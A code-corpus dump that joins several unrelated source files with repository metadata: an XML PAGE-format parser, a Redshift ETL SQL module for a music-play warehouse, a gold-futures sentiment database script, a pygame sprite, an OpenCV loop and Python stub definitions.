if value is not None and 'readingOrientation' not in already_processed:
already_processed.add('readingOrientation')
value = self.gds_parse_float(value, node, 'readingOrientation')
self.readingOrientation = value
value = find_attr_value_('indented', node)
if value is not None and 'indented' not in already_processed:
already_processed.add('indented')
if value in ('true', '1'):
self.indented = True
elif value in ('false', '0'):
self.indented = False
else:
raise_parse_error(node, 'Bad boolean attribute')
value = find_attr_value_('align', node)
if value is not None and 'align' not in already_processed:
already_processed.add('align')
self.align = value
self.validate_AlignSimpleType(self.align) # validate type AlignSimpleType
value = find_attr_value_('primaryLanguage', node)
if value is not None and 'primaryLanguage' not in already_processed:
already_processed.add('primaryLanguage')
self.primaryLanguage = value
self.validate_LanguageSimpleType(self.primaryLanguage) # validate type LanguageSimpleType
value = find_attr_value_('secondaryLanguage', node)
if value is not None and 'secondaryLanguage' not in already_processed:
already_processed.add('secondaryLanguage')
self.secondaryLanguage = value
self.validate_LanguageSimpleType(self.secondaryLanguage) # validate type LanguageSimpleType
value = find_attr_value_('primaryScript', node)
if value is not None and 'primaryScript' not in already_processed:
already_processed.add('primaryScript')
self.primaryScript = value
self.validate_ScriptSimpleType(self.primaryScript) # validate type ScriptSimpleType
value = find_attr_value_('secondaryScript', node)
if value is not None and 'secondaryScript' not in already_processed:
already_processed.add('secondaryScript')
self.secondaryScript = value
self.validate_ScriptSimpleType(self.secondaryScript) # validate type ScriptSimpleType
value = find_attr_value_('production', node)
if value is not None and 'production' not in already_processed:
already_processed.add('production')
self.production = value
self.validate_ProductionSimpleType(self.production) # validate type ProductionSimpleType
super(TextRegionType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'TextLine':
obj_ = TextLineType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.TextLine.append(obj_)
obj_.original_tagname_ = 'TextLine'
elif nodeName_ == 'TextEquiv':
obj_ = TextEquivType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.TextEquiv.append(obj_)
obj_.original_tagname_ = 'TextEquiv'
elif nodeName_ == 'TextStyle':
obj_ = TextStyleType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.TextStyle = obj_
obj_.original_tagname_ = 'TextStyle'
super(TextRegionType, self).buildChildren(child_, node, nodeName_, True)
# end class TextRegionType
GDSClassesMapping = {
'PcGts': PcGtsType,
}
USAGE_TEXT = """
Usage: python <Parser>.py [ -s ] <in_xml_file>
"""
def usage():
print(USAGE_TEXT)
sys.exit(1)
def get_root_tag(node):
tag = Tag_pattern_.match(node.tag).groups()[-1]
rootClass = GDSClassesMapping.get(tag)
if rootClass is None:
rootClass = globals().get(tag)
return tag, rootClass
def get_required_ns_prefix_defs(rootNode):
'''Get all name space prefix definitions required in this XML doc.
Return a dictionary of definitions and a char string of definitions.
'''
nsmap = {
prefix: uri
for node in rootNode.iter()
for (prefix, uri) in node.nsmap.items()
if prefix is not None
}
namespacedefs = ' '.join([
'xmlns:{}="{}"'.format(prefix, uri)
for prefix, uri in nsmap.items()
])
return nsmap, namespacedefs
def parse(inFileName, silence=False, print_warnings=True):
global CapturedNsmap_
gds_collector = GdsCollector_()
parser = None
doc = parsexml_(inFileName, parser)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'PcGtsType'
rootClass = PcGtsType
rootObj = rootClass.factory()
rootObj.build(rootNode, gds_collector_=gds_collector)
CapturedNsmap_, namespacedefs = get_required_ns_prefix_defs(rootNode)
if not SaveElementTreeNode:
doc = None
rootNode = None
if not silence:
sys.stdout.write('<?xml version="1.0" ?>\n')
rootObj.export(
sys.stdout, 0, name_=rootTag,
namespacedef_=namespacedefs,
pretty_print=True)
if print_warnings and len(gds_collector.get_messages()) > 0:
separator = ('-' * 50) + '\n'
sys.stderr.write(separator)
sys.stderr.write('----- Warnings -- count: {} -----\n'.format(
len(gds_collector.get_messages()), ))
gds_collector.write_messages(sys.stderr)
sys.stderr.write(separator)
return rootObj
def parseEtree(inFileName, silence=False, print_warnings=True,
mapping=None, nsmap=None):
parser = None
doc = parsexml_(inFileName, parser)
gds_collector = GdsCollector_()
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'PcGtsType'
rootClass = PcGtsType
rootObj = rootClass.factory()
rootObj.build(rootNode, gds_collector_=gds_collector)
# Enable Python to collect the space used by the DOM.
if mapping is None:
mapping = {}
rootElement = rootObj.to_etree(
None, name_=rootTag, mapping_=mapping, nsmap_=nsmap)
reverse_mapping = rootObj.gds_reverse_node_mapping(mapping)
if not SaveElementTreeNode:
doc = None
rootNode = None
if not silence:
content = etree_.tostring(
rootElement, pretty_print=True,
xml_declaration=True, encoding="utf-8")
sys.stdout.write(str(content))
sys.stdout.write('\n')
if print_warnings and len(gds_collector.get_messages()) > 0:
separator = ('-' * 50) + '\n'
sys.stderr.write(separator)
sys.stderr.write('----- Warnings -- count: {} -----\n'.format(
len(gds_collector.get_messages()), ))
gds_collector.write_messages(sys.stderr)
sys.stderr.write(separator)
return rootObj, rootElement, mapping, reverse_mapping
def parseString(inString, silence=False, print_warnings=True):
'''Parse a string, create the object tree, and export it.
Arguments:
- inString -- A string. This XML fragment should not start
with an XML declaration containing an encoding.
- silence -- A boolean. If False, export the object.
Returns -- The root object in the tree.
'''
parser = None
rootNode= parsexmlstring_(inString, parser)
gds_collector = GdsCollector_()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'PcGtsType'
rootClass = PcGtsType
rootObj = rootClass.factory()
rootObj.build(rootNode, gds_collector_=gds_collector)
if not SaveElementTreeNode:
rootNode = None
if not silence:
sys.stdout.write('<?xml version="1.0" ?>\n')
rootObj.export(
sys.stdout, 0, name_=rootTag,
namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"')
if print_warnings and len(gds_collector.get_messages()) > 0:
separator = ('-' * 50) + '\n'
sys.stderr.write(separator)
sys.stderr.write('----- Warnings -- count: {} -----\n'.format(
len(gds_collector.get_messages()), ))
gds_collector.write_messages(sys.stderr)
sys.stderr.write(separator)
return rootObj
def parseLiteral(inFileName, silence=False, print_warnings=True):
parser = None
doc = parsexml_(inFileName, parser)
gds_collector = GdsCollector_()
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'PcGtsType'
rootClass = PcGtsType
rootObj = rootClass.factory()
rootObj.build(rootNode, gds_collector_=gds_collector)
# Enable Python to collect the space used by the DOM.
if not SaveElementTreeNode:
doc = None
rootNode = None
if not silence:
sys.stdout.write('#from page import *\n\n')
sys.stdout.write('import page as model_\n\n')
sys.stdout.write('rootObj = model_.rootClass(\n')
rootObj.exportLiteral(sys.stdout, 0, name_=rootTag)
sys.stdout.write(')\n')
if print_warnings and len(gds_collector.get_messages()) > 0:
separator = ('-' * 50) + '\n'
sys.stderr.write(separator)
sys.stderr.write('----- Warnings -- count: {} -----\n'.format(
len(gds_collector.get_messages()), ))
gds_collector.write_messages(sys.stderr)
sys.stderr.write(separator)
return rootObj
def main():
args = sys.argv[1:]
if len(args) == 1:
parse(args[0])
else:
usage()
if __name__ == '__main__':
#import pdb; pdb.set_trace()
main()
RenameMappings_ = {
}
#
# Mapping of namespaces to types defined in them
# and the file in which each is defined.
# simpleTypes are marked "ST" and complexTypes "CT".
NamespaceToDefMappings_ = {'http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15': [('ColourSimpleType',
'assets/schema/pagecontent.xsd',
'ST'),
('ReadingDirectionSimpleType',
'assets/schema/pagecontent.xsd',
'ST'),
('TextLineOrderSimpleType',
'assets/schema/pagecontent.xsd',
'ST'),
('TextTypeSimpleType',
'assets/schema/pagecontent.xsd',
'ST'),
('PageTypeSimpleType',
'assets/schema/pagecontent.xsd',
'ST'),
('ConfSimpleType',
'assets/schema/pagecontent.xsd',
'ST'),
('LanguageSimpleType',
'assets/schema/pagecontent.xsd',
'ST'),
('ScriptSimpleType',
'assets/schema/pagecontent.xsd',
'ST'),
('ColourDepthSimpleType',
'assets/schema/pagecontent.xsd',
'ST'),
('GraphicsTypeSimpleType',
'assets/schema/pagecontent.xsd',
'ST'),
('ChartTypeSimpleType',
'assets/schema/pagecontent.xsd',
'ST'),
('PointsType',
'assets/schema/pagecontent.xsd',
'ST'),
('ProductionSimpleType',
'assets/schema/pagecontent.xsd',
'ST'),
('AlignSimpleType',
'assets/schema/pagecontent.xsd',
'ST'),
('GroupTypeSimpleType',
'assets/schema/pagecontent.xsd',
'ST'),
('TextDataTypeSimpleType',
'assets/schema/pagecontent.xsd',
'ST'),
('UnderlineStyleSimpleType',
'assets/schema/pagecontent.xsd',
'ST'),
('PcGtsType',
'assets/schema/pagecontent.xsd',
'CT'),
('MetadataType',
'assets/schema/pagecontent.xsd',
'CT'),
('MetadataItemType',
'assets/schema/pagecontent.xsd',
'CT'),
('LabelsType',
'assets/schema/pagecontent.xsd',
'CT'),
('LabelType',
'assets/schema/pagecontent.xsd',
'CT'),
('PageType',
'assets/schema/pagecontent.xsd',
'CT'),
('TextRegionType',
'assets/schema/pagecontent.xsd',
'CT'),
('CoordsType',
'assets/schema/pagecontent.xsd',
'CT'),
('TextLineType',
'assets/schema/pagecontent.xsd',
'CT'),
('WordType',
'assets/schema/pagecontent.xsd',
'CT'),
('GlyphType',
'assets/schema/pagecontent.xsd',
'CT'),
('TextEquivType',
'assets/schema/pagecontent.xsd',
'CT'),
('ImageRegionType',
'assets/schema/pagecontent.xsd',
'CT'),
('LineDrawingRegionType',
'assets/schema/pagecontent.xsd',
'CT'),
('GraphicRegionType',
'assets/schema/pagecontent.xsd',
'CT'),
('TableRegionType',
'assets/schema/pagecontent.xsd',
'CT'),
('GridType',
'assets/schema/pagecontent.xsd',
'CT'),
('GridPointsType',
'assets/schema/pagecontent.xsd',
'CT'),
('ChartRegionType',
'assets/schema/pagecontent.xsd',
'CT'),
('SeparatorRegionType',
'assets/schema/pagecontent.xsd',
'CT'),
('MathsRegionType',
'assets/schema/pagecontent.xsd',
'CT'),
('ChemRegionType',
'assets/schema/pagecontent.xsd',
'CT'),
('MapRegionType',
'assets/schema/pagecontent.xsd',
'CT'),
('MusicRegionType',
'assets/schema/pagecontent.xsd',
'CT'),
('AdvertRegionType',
'assets/schema/pagecontent.xsd',
'CT'),
('NoiseRegionType',
'assets/schema/pagecontent.xsd',
'CT'),
('UnknownRegionType',
'assets/schema/pagecontent.xsd',
'CT'),
('CustomRegionType',
'assets/schema/pagecontent.xsd',
'CT'),
('PrintSpaceType',
'assets/schema/pagecontent.xsd',
'CT'),
('ReadingOrderType',
'assets/schema/pagecontent.xsd',
'CT'),
('RegionRefIndexedType',
'assets/schema/pagecontent.xsd',
'CT'),
('OrderedGroupIndexedType',
'assets/schema/pagecontent.xsd',
'CT'),
('UnorderedGroupIndexedType',
'assets/schema/pagecontent.xsd',
'CT'),
('RegionRefType',
'assets/schema/pagecontent.xsd',
'CT'),
('OrderedGroupType',
'assets/schema/pagecontent.xsd',
'CT'),
('UnorderedGroupType',
'assets/schema/pagecontent.xsd',
'CT'),
('BorderType',
'assets/schema/pagecontent.xsd',
'CT'),
('LayersType',
'assets/schema/pagecontent.xsd',
'CT'),
('LayerType',
'assets/schema/pagecontent.xsd',
'CT'),
('BaselineType',
'assets/schema/pagecontent.xsd',
'CT'),
('RelationsType',
'assets/schema/pagecontent.xsd',
'CT'),
('RelationType',
'assets/schema/pagecontent.xsd',
'CT'),
('TextStyleType',
'assets/schema/pagecontent.xsd',
'CT'),
('RegionType',
'assets/schema/pagecontent.xsd',
'CT'),
('AlternativeImageType',
'assets/schema/pagecontent.xsd',
'CT'),
('GraphemesType',
'assets/schema/pagecontent.xsd',
'CT'),
('GraphemeBaseType',
'assets/schema/pagecontent.xsd',
'CT'),
('GraphemeType',
'assets/schema/pagecontent.xsd',
'CT'),
('NonPrintingCharType',
'assets/schema/pagecontent.xsd',
'CT'),
('GraphemeGroupType',
'assets/schema/pagecontent.xsd',
'CT'),
('UserDefinedType',
'assets/schema/pagecontent.xsd',
'CT'),
('UserAttributeType',
'assets/schema/pagecontent.xsd',
'CT'),
('TableCellRoleType',
'assets/schema/pagecontent.xsd',
'CT'),
('RolesType',
'assets/schema/pagecontent.xsd',
'CT')]}
__all__ = [
"AdvertRegionType",
"AlternativeImageType",
"BaselineType",
"BorderType",
"ChartRegionType",
"ChemRegionType",
"CoordsType",
"CustomRegionType",
"GlyphType",
"GraphemeBaseType",
"GraphemeGroupType",
"GraphemeType",
"GraphemesType",
"GraphicRegionType",
"GridPointsType",
"GridType",
"ImageRegionType",
"LabelType",
"LabelsType",
"LayerType",
"LayersType",
"LineDrawingRegionType",
"MapRegionType",
"MathsRegionType",
"MetadataItemType",
"MetadataType",
"MusicRegionType",
"NoiseRegionType",
"NonPrintingCharType",
"OrderedGroupIndexedType",
"OrderedGroupType",
"PageType",
"PcGtsType",
"PrintSpaceType",
"ReadingOrderType",
"RegionRefIndexedType",
"RegionRefType",
"RegionType",
"RelationType",
"RelationsType",
"RolesType",
"SeparatorRegionType",
"TableCellRoleType",
"TableRegionType",
"TextEquivType",
"TextLineType",
"TextRegionType",
"TextStyleType",
"UnknownRegionType",
"UnorderedGroupIndexedType",
"UnorderedGroupType",
"UserAttributeType",
"UserDefinedType",
"WordType"
]
|
[
"lucas@sulzbach.org"
] |
lucas@sulzbach.org
|
9e5d44f522f009d23699c1591c4e0874b753a458
|
74b978b712a5fa1645e7b7dcc9488a9a47a7a1b5
|
/blueprint/models.py
|
d4fb16656bfd02c446dbc1c4704c4fcfc26c8fbc
|
[] |
no_license
|
ikalchenko/blueprint
|
6a9653365c08651e997e0ee230e945d405746cb7
|
ab5c039fe2a1fce75266f17e00c867e2abd05e78
|
refs/heads/master
| 2020-05-21T18:55:43.272085
| 2019-05-20T19:21:32
| 2019-05-20T19:21:32
| 186,143,153
| 0
| 0
| null | 2019-05-20T19:21:34
| 2019-05-11T14:30:33
|
Python
|
UTF-8
|
Python
| false
| false
| 299
|
py
|
from .extensions import db
class BaseModel(db.Model):
id = db.Column(db.Integer, primary_key=True)
# date_created = db.Column(db.DateTime, server_default=db.func.now())
# date_modified = db.Column(db.DateTime, server_default=db.func.now())
async def serialize(self):
pass
|
[
"ikalchenko99@gmail.com"
] |
ikalchenko99@gmail.com
|
575f16350068085904d3e88d041788aa5d2ad0bc
|
c6b46e402eea7769dd5c7e5232e677976ddd7482
|
/main.py
|
9b7acb37f2a0ee60bbe8a8e955537c68e2642ddb
|
[
"MIT"
] |
permissive
|
alhazmy13/ResistorsOpenCV
|
cbdab3b2c3c9736452e7a97f0f2c16e3b630a39d
|
95237e6014ef51a4a2eb3f049f9844f535090ecf
|
refs/heads/master
| 2023-02-14T02:24:55.266688
| 2020-10-25T12:16:52
| 2020-10-25T12:16:52
| 307,081,563
| 3
| 0
| null | 2020-10-25T12:04:24
| 2020-10-25T11:14:44
|
Python
|
UTF-8
|
Python
| false
| false
| 305
|
py
|
import cv2
from vision import Vision
vision = Vision()
if __name__ == "__main__":
while not (cv2.waitKey(1) == ord('q')):
_, live_img = vision.get_camera()
vision.print_result(live_img=live_img)
cv2.imshow("Frame", live_img)
vision.release()
cv2.destroyAllWindows()
|
[
"me@alhazmy13.net"
] |
me@alhazmy13.net
|
e770a09f01a41928a6a78f803955c09a6b3e83a7
|
33638679295dbe6bf1c9708fba570708afdc081b
|
/api/stablemanager/datalayer.py
|
5229c165c0ee079a4229b0c9b6270f1044727fe5
|
[
"Apache-2.0"
] |
permissive
|
toddg3s/wtfmanager
|
3317c252138d390766d3214ae6ccc472f0413d87
|
04fb30fb7de1a60a74e17b1254b5c2d3a7450b73
|
refs/heads/master
| 2021-08-31T22:45:12.444566
| 2017-12-23T06:55:33
| 2017-12-23T06:55:33
| 115,176,380
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,260
|
py
|
class DataProvider:
def get(self, datatype, dataid):
pass
def put(self, dataobject):
pass
def delete(self, dataobject):
pass
def query(self, datatype):
pass
def get_actions(self, from_date, to_date):
pass
def get_horse_schedules(self, horse_id):
pass
def get_horse_people(self, horse_id, person_type=None):
pass
class QuerySpec:
DataType = ''
Filters = {}
Sorts = {}
_doquery = None
def __init__(self, datatype, doquery):
self.DataType = datatype
self._doquery = doquery
def filter(self, prop, operator, value):
queryable = False
if prop == 'id':
queryable = True
elif self.DataType == 'schedule' and prop == 'horse_id':
queryable = True
elif self.DataType == 'association' and (prop == 'horse_id' or prop == 'person_id'):
queryable = True
elif self.DataType == 'action' and prop == 'horse_id':
queryable = True
self.Filters[prop] = (operator, value, queryable)
return self
def sort(self, prop, order='asc'):
self.Sorts[prop] = order
return self
def go(self):
return self._doquery(self)
|
[
"todd@g3s.net"
] |
todd@g3s.net
|
ab1ae3d0b32da3e9f20bd3fb9d1b81d217bd46eb
|
02d0b4180184eb5598b3f9c7d2c34540562e74ea
|
/ND03 - Data Warehouse/sql_queries.py
|
07cf68f9a46e83fc8bf42ff754f8ffebd3afe15c
|
[] |
no_license
|
sketha33/Udacity_DE_NanoDegree
|
8d6e0438686cd61c925c39f13c74257ea6bd9edc
|
b0d310821a4ea98afd1c7b5ca9f06b0cc1ca2c5f
|
refs/heads/main
| 2022-12-29T19:42:33.974834
| 2020-10-18T20:22:23
| 2020-10-18T20:22:23
| 303,818,151
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,499
|
py
|
import configparser
# CONFIG
config = configparser.ConfigParser()
config.read('dwh.cfg')
# Truncate TABLES
staging_events_table_trun = "TRUNCATE TABLE staging_events"
staging_songs_table_trun = "TRUNCATE TABLE staging_songs"
songplay_table_trun = "TRUNCATE TABLE songplay"
user_table_trun = "TRUNCATE TABLE users"
song_table_trun = "TRUNCATE TABLE songs"
artist_table_trun = "TRUNCATE TABLE artists"
time_table_trun = "TRUNCATE TABLE time"
# DROP TABLES
staging_events_table_drop = "DROP TABLE staging_events"
staging_songs_table_drop = "DROP TABLE staging_songs"
songplay_table_drop = "DROP TABLE songplay"
user_table_drop = "DROP TABLE users"
song_table_drop = "DROP TABLE songs"
artist_table_drop = "DROP TABLE artists"
time_table_drop = "DROP TABLE time"
# CREATE TABLES
staging_events_table_create = (""" CREATE TABLE IF NOT EXISTS staging_events ( artist VARCHAR, \
auth VARCHAR, \
firstName VARCHAR, \
gender VARCHAR, \
itemInSession VARCHAR, \
lastName VARCHAR, \
length FLOAT, \
level VARCHAR, \
location VARCHAR, \
method VARCHAR, \
page VARCHAR, \
registration VARCHAR, \
sessionId VARCHAR, \
song VARCHAR, \
status VARCHAR, \
ts VARCHAR, \
userAgent VARCHAR, \
userId VARCHAR ); """)
staging_songs_table_create = (""" CREATE TABLE IF NOT EXISTS staging_songs (num_songs INTEGER, \
artist_id VARCHAR, \
artist_latitude VARCHAR, \
artist_longitude VARCHAR, \
artist_location VARCHAR, \
artist_name VARCHAR, \
song_id VARCHAR, \
title VARCHAR, \
duration FLOAT, \
year INTEGER); """)
songplay_table_create = (""" CREATE TABLE IF NOT EXISTS songplay (songplay_id INTEGER IDENTITY(0,1) NOT NULL PRIMARY KEY, \
start_time DATE, \
user_id VARCHAR NOT NULL, \
level VARCHAR, \
song_id VARCHAR NOT NULL, \
artist_id VARCHAR NOT NULL, \
session_id VARCHAR, \
location VARCHAR, \
user_agent VARCHAR); """)
user_table_create = (""" CREATE TABLE IF NOT EXISTS users (user_id VARCHAR NOT NULL PRIMARY KEY, \
first_name VARCHAR, \
last_name VARCHAR, \
gender VARCHAR, \
level VARCHAR); """)
song_table_create = (""" CREATE TABLE IF NOT EXISTS songs (song_id VARCHAR NOT NULL PRIMARY KEY, \
title VARCHAR, \
artist_id VARCHAR NOT NULL, \
year VARCHAR, \
duration BIGINT ); """)
artist_table_create = (""" CREATE TABLE IF NOT EXISTS artists (artist_id VARCHAR NOT NULL PRIMARY KEY, \
name VARCHAR, \
location VARCHAR, \
latitude VARCHAR, \
longitude VARCHAR) ; """)
time_table_create = (""" CREATE TABLE IF NOT EXISTS time (start_time TIMESTAMP NOT NULL PRIMARY KEY , \
hour VARCHAR, \
day VARCHAR, \
week VARCHAR, \
month VARCHAR, \
year VARCHAR, \
weekday VARCHAR); """)
# STAGING TABLES
staging_events_copy = (""" copy staging_events from {} \
credentials 'aws_iam_role={}'\
json {} \
region 'us-west-2';""").format(config.get("S3", "LOG_DATA"), config.get("IAM_ROLE", "ARN"),config.get("S3", "LOG_JSONPATH"))
staging_songs_copy = (""" copy staging_songs from {} \
credentials 'aws_iam_role={}' \
json 'auto' \
region 'us-west-2';""").format(config.get("S3", "SONG_DATA"), config.get("IAM_ROLE", "ARN"))
# Final Tables
songplay_table_insert = (""" INSERT INTO songplay (start_time, \
user_id, \
level, \
song_id, \
artist_id, \
session_id, \
location, \
user_agent) \
(SELECT DISTINCT TIMESTAMP 'epoch' + ts/1000 *INTERVAL '1 second', \
userId, \
level, \
song_id, \
artist_id, \
sessionId, \
location, \
useragent \
FROM staging_songs, staging_events \
WHERE title = song \
AND artist = artist_name
AND page = 'NextSong' ) """)
user_table_insert = (""" INSERT INTO users (user_id, \
first_name, \
last_name, \
gender, \
level) \
(SELECT DISTINCT userId, \
firstName, \
lastname, \
gender, \
level \
FROM staging_events
WHERE page = 'NextSong') """)
song_table_insert = (""" INSERT INTO songs(song_id, \
title, \
artist_id, \
year, \
duration) \
(SELECT DISTINCT song_id, \
title, \
artist_id, \
year, \
duration \
FROM staging_songs) """)
artist_table_insert = (""" INSERT INTO artists (artist_id, \
name, \
location, \
latitude, \
longitude ) \
(SELECT DISTINCT artist_id, \
artist_name, \
artist_location, \
artist_latitude, \
artist_longitude \
FROM staging_songs )
""")
time_table_insert = (""" INSERT INTO time (start_time,hour,day,week,month,year,weekday) \
( SELECT DISTINCT(start_time) AS start_time, \
EXTRACT(hour FROM start_time) AS hour, \
EXTRACT(day FROM start_time) AS day, \
EXTRACT(week FROM start_time) AS week, \
EXTRACT(month FROM start_time) AS month, \
EXTRACT(year FROM start_time) AS year, \
EXTRACT(dayofweek FROM start_time) as weekday \
FROM songplay);
""")
# QUERY LISTS
create_table_queries = [staging_events_table_create, \
staging_songs_table_create, \
songplay_table_create, \
user_table_create, \
song_table_create, \
artist_table_create, \
time_table_create]
drop_table_queries = [staging_events_table_drop, \
staging_songs_table_drop, \
songplay_table_drop, \
user_table_drop, \
song_table_drop, \
artist_table_drop, \
time_table_drop]
copy_table_queries = [staging_events_copy, \
staging_songs_copy]
insert_table_queries = [songplay_table_insert, \
user_table_insert, \
song_table_insert, \
artist_table_insert, \
time_table_insert]
trunc_table_queries = [staging_events_table_trun, \
staging_songs_table_trun, \
songplay_table_trun, \
user_table_trun, \
song_table_trun, \
artist_table_trun, \
time_table_trun]
|
[
"noreply@github.com"
] |
noreply@github.com
|
9e750f8075d60ec1bff5c0ffbb0d33f61c64a8dd
|
2b7cc7d56ee829213d0111f9c729997f708f9c66
|
/CreateDB/main.py
|
0bfe8ad211906988fffb8422edc8c842c6550f66
|
[] |
no_license
|
Vincentie/TreePrediction
|
69bb3e92afdd9c33070a18478b604d94feaf45bb
|
47d632c5701916a581964bf683d4551e0ededca4
|
refs/heads/master
| 2021-01-20T17:29:30.309974
| 2018-09-01T14:57:43
| 2018-09-01T14:57:43
| 90,878,296
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,015
|
py
|
__author__ = 'JianxuanLiu'
from parse_and_save_data import parse_and_save_data
from tradeDays import getTradeDays
from computeSentimentals import computeSentiments
import numpy as np
import pandas as pd
from datetime import datetime
from datetime import timedelta
import sqlite3
""" This main.py is performed to create a data table whose data can be picked to aplly a prediction tree.
Specifically, volume weighted average prices of different gold futures' prices and sentimental grades
processed by NLP methods are those data to be trained in a prediction tree model.
"""
def computeVWFactor(df, factor):
""" Computer a series of factors in a DataFrame using volume weighted avearge method.
"""
df = df.replace('', np.nan)
df.fillna(method='pad')
df.fillna(method='bfill')
df1 = df[['Volume']].astype(float)
df2 = df[[factor]].astype(float)
df2.columns = ['Volume']
vw = np.sum((df1 * df2)['Volume']) / np.sum(df1['Volume'])
return vw
if __name__ == '__main__':
beginDate = '2012-01-01'
endDate = '2017-01-01'
saveUrl1 = 'Data/FData.sqlite'
saveUrl2 = 'Data/Sentiments.sqlite'
"""Parse and save data"""
parse_and_save_data(beginDate, endDate, saveUrl1, option='au_trade').parse_and_save_data()
parse_and_save_data(beginDate, endDate, saveUrl1, option='au_sentiments').parse_and_save_data()
"""Obatain the trading data and sentimental grades of every day for future use."""
con = sqlite3.connect(saveUrl1)
sql = "SELECT * from SHFE"
data = pd.read_sql(sql, con)
avgdata = {}
sentiDict = computeSentiments(beginDate, endDate, saveUrl2).getSentiments()
"""Compute the volume weighted average factors and concatenate them with the sentimental grades."""
for date in getTradeDays(beginDate, endDate):
temp_df = data[data.date == date + ' ' + '00:00:00']
values = []
for item in ['Close', 'High', 'Low', 'Change2', 'ChangeofOpenInt']:
values.append(computeVWFactor(temp_df, item))
values.append(float(sum(temp_df['Volume']))) #Add the total trading volume to the values.
values.append(sentiDict[date]) #Add sentimental grades to the values.
key = date
avgdata.setdefault(key, values)
"""Insert the handled data into a new table."""
conna = sqlite3.connect('Data/FAvgData.sqlite')
cursor = conna.cursor()
SQLquery1 = "create table if not exists SHFEAvg(date datetime, Close numeric(15,2), High numeric(15,2), Low numeric(15,2),\
Change2 numeric(15,2), ChangeofOpenInt numeric(25,2), Volume numeric(15,2), Sentiment numeric(15,2) )"
cursor.execute(SQLquery1)
for key, value in avgdata.items():
iter = (key, value[0], value[1], value[2], value[3], value[4], value[5], value[6])
SQLquery2 = "insert into SHFEAvg" + " " + "values(?, ?, ?, ?, ?, ?, ?, ?)"
cursor.execute(SQLquery2, iter)
conna.commit()
conna.close()
|
[
"lavinho@hotmail.com"
] |
lavinho@hotmail.com
|
f18eaaed0fbf1f40f0d8fed1c9e176c104f334bf
|
4454ed622d051f602373d7946a3936ff33cc8e97
|
/alien/enemy.py
|
1536b22abde5d8b5dd744b37d3c66d5005970225
|
[] |
no_license
|
showlocked/plane_game
|
23c056c7b85c00184c357001db21300d5eb1680e
|
b25cd1fdbce2735c903bbedb02fd85a457bcdc8f
|
refs/heads/master
| 2021-09-26T22:00:14.874451
| 2017-12-24T18:21:19
| 2017-12-24T18:21:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,560
|
py
|
from random import random
import pygame
from pygame.sprite import Sprite
__author__ = 'heshipeng'
class Enemy(Sprite):
""" 敌方飞机类 """
def __init__(self, ali_settings, screen):
""" 初始化外星人并设置其初始位置 """
super(Enemy, self).__init__()
self.screen = screen
self.ali_settings = ali_settings
# 加载外星人图像,并设置其rect属性
self.image = pygame.image.load('images/enemy_plane.png')
self.rect = self.image.get_rect()
# 根据敌方飞机出现位置判断移动方向
self.move_right = True
# 每个外星人初始都在屏幕左上角附近
self.rect.x = self.get_width()
self.rect.y = self.rect.height
# 存储敌方飞机的准确位置
self.x = float(self.rect.x)
self.y = float(self.rect.y)
def blitme(self):
""" 在指定位置画敌方飞机 """
self.screen.blit(self.image, self.rect)
def update(self, *args):
if self.move_right:
self.x += self.ali_settings.enemy_speed_factor
else:
self.x -= self.ali_settings.enemy_speed_factor
self.y += self.ali_settings.enemy_speed_factor
self.rect.x = self.x
self.rect.y = self.y
def get_width(self):
width_range = [0, self.screen.get_rect().right]
if random() > 0.5:
self.move_right = True
return width_range[0]
else:
self.move_right = False
return width_range[1]
|
[
"727138269@qq.com"
] |
727138269@qq.com
|
bbd48bd8cb59d48d867df4dbad5af7cf9a4a87d6
|
085ce75a507df6e755cabb7a65c4a2a8c98762ba
|
/dockerfiles/root/.pycharm_helpers/python_stubs/-252567642/_multiprocessing.py
|
fee21a8eebfb053e451fc85ad0c04b02fa80eb4e
|
[] |
no_license
|
Arhzi/habr-docker-article
|
d44302db1fe157d81fe0818e762e82218f50e31f
|
6fb094860b612e307beadaeb22981aa0ee64e964
|
refs/heads/master
| 2021-01-23T20:41:47.398025
| 2015-12-10T08:56:33
| 2015-12-10T08:56:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,156
|
py
|
# encoding: utf-8
# module _multiprocessing
# from /usr/local/lib/python2.7/lib-dynload/_multiprocessing.so
# by generator 1.137
# no doc
# no imports
# functions
def address_of_buffer(obj): # real signature unknown; restored from __doc__
"""
address_of_buffer(obj) -> int
Return address of obj assuming obj supports buffer inteface
"""
return 0
def recvfd(sockfd): # real signature unknown; restored from __doc__
"""
recvfd(sockfd) -> fd
Receive a file descriptor over a unix domain socket
whose file decriptor is sockfd
"""
pass
def sendfd(sockfd, fd): # real signature unknown; restored from __doc__
"""
sendfd(sockfd, fd) -> None
Send file descriptor given by fd over the unix domain socket
whose file decriptor is sockfd
"""
pass
# classes
class Connection(object):
"""
Connection type whose constructor signature is
Connection(handle, readable=True, writable=True).
The constructor does *not* duplicate the handle.
"""
def close(self, *args, **kwargs): # real signature unknown
""" close the connection """
pass
def fileno(self, *args, **kwargs): # real signature unknown
""" file descriptor or handle of the connection """
pass
def poll(self, *args, **kwargs): # real signature unknown
""" whether there is any input available to be read """
pass
def recv(self, *args, **kwargs): # real signature unknown
""" receive a (picklable) object """
pass
def recv_bytes(self, *args, **kwargs): # real signature unknown
""" receive byte data as a string """
pass
def recv_bytes_into(self, *args, **kwargs): # real signature unknown
"""
receive byte data into a writeable buffer-like object
returns the number of bytes read
"""
pass
def send(self, *args, **kwargs): # real signature unknown
""" send a (picklable) object """
pass
